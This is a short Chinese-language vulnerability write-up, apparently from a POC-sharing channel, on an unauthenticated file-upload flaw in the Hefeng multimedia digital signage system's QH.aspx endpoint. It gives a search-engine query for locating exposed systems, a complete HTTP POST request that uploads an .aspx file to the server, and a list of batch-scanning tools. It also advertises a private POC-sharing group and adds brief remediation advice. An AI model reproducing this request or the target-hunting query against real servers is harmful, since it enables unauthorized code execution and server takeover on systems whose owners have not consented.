0x01 產品簡介
和豐多媒體信息發布系統也稱數字標牌(Digital Signage),是指通過大屏幕終端顯示設備,發布商業、財經和娛樂信息的多媒體專業視聽系統,常被稱為除紙張媒體、電臺、電視、互聯網之外的“第五媒體”。該系統基于Web的全B/S先進架構,支持大用戶數、大并發數及權限管理,可以同時連接數千、上萬個播放終端。
0x02 漏洞概述
和豐多媒體信息發布系統 QH.aspx 接口存在文件上傳漏洞,未經身份驗證的遠程攻擊者可利用此漏洞上傳任意后門文件,執行惡意指令,從而獲取服務器權限。
0x03 搜索引擎
app="和豐山海-數字標牌"
0x04 漏洞復現
POST /QH.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="fileToUpload"; filename="qwe.aspx"
Content-Type: application/octet-stream<%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="action"upload
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="responderId"ResourceNewResponder
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="remotePath"/opt/resources
------WebKitFormBoundaryhbcZX7o0Hw19h3kr--
0x05 工具批量
nuclei
afrog
xray
POC腳本獲取
請使用VX掃一掃加入內部POC腳本分享圈子
0x06 修復建議
關閉互聯網暴露面或接口設置訪問權限
升級至安全版本
